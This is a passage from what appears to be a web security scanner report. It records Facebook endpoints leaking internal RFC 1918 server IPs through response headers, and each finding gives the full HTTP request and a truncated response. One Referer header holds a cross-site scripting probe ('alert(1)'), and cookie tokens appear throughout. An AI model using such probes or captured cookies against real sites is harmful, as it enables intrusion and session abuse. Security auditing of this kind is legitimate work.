GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19ecc8691df262%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b75be2b5dc614%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ed947585ca75e%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15def3c5eec6f6%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b0aabe0f398b4%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff1078b3d2a0c68e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df302359b9dcda34&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:55:51 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f15def3c5eec6f6&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff1078b3d2a0c68e&relation=parent&transport=postmessage&frame=f302359b9dcd
...[SNIP]...

19.44. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1ea97168c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df115386ba%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df137439048%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df16e85cf88%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df143bb58e4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff27ad894f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df323849ec%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.120.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Length: 270

<script type="text/javascript">
parent.postMessage("?=&cb=f16e85cf88&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff27ad894f4&relation=parent&transport=postmessage&frame=f323849ec&result=
...[SNIP]...

19.45. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1158553dc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d3f3d5a4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfa0adb5e8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2faf2224%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df47133458%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff323a3374c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df959b19dc%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.136.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:48:10 GMT
Content-Length: 269

<script type="text/javascript">
parent.postMessage("?=&cb=f2faf2224&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff323a3374c&relation=parent&transport=postmessage&frame=f959b19dc&result=x
...[SNIP]...

19.46. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df277dfee7c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df242d21f1%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2cea178d8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1493b4af8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1d5a9908%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff3ee253%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.45
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:23 GMT
Content-Length: 269

<script type="text/javascript">
parent.postMessage("?=&cb=f1493b4af8&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff390abd57c&relation=parent&transport=postmessage&frame=ff3ee253&result=x
...[SNIP]...

19.47. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31c6162fc%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d015f74c%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df58b48b84%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ca5b4634%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b0222c98%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.30
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:21 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f2ca5b4634&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ffe3b14c2c&relation=parent&transport=postmessage&frame=f20da6dfe8", "http:\/\/
...[SNIP]...

19.48. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1bf7f9744%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d7f499b4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfbc686034%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df57b7336c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1a31d8abc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Content-Length: 267

<script type="text/javascript">
parent.postMessage("?=&cb=f57b7336c&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff2426b14e&relation=parent&transport=postmessage&frame=f101212c4&result=xx
...[SNIP]...

19.49. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df241d003c8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3a2a431ec%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df128d2c2e%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfd50826f8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df87ba511%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.57
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:30 GMT
Content-Length: 270

<script type="text/javascript">
parent.postMessage("?=&cb=fd50826f8&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff390abd57c&relation=parent&transport=postmessage&frame=f3b5b0ac84&result=
...[SNIP]...

19.50. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=117892634961387&app_id=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aa62330c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb8067c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd792ca%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df244af3cd8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e5d649a8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.33.58
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f244af3cd8&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent&transport=postmessage&frame=f19a36be4"
...[SNIP]...

19.51. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca4e4f9c%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2162a13ac%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df145a1750%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b1d4b078%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e7a08d78%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.250.51
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:37 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f3b1d4b078&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff2158a901c&relation=parent&transport=postmessage&frame=f3e69481", "http:\/\/w
...[SNIP]...

19.52. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...

19.53. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
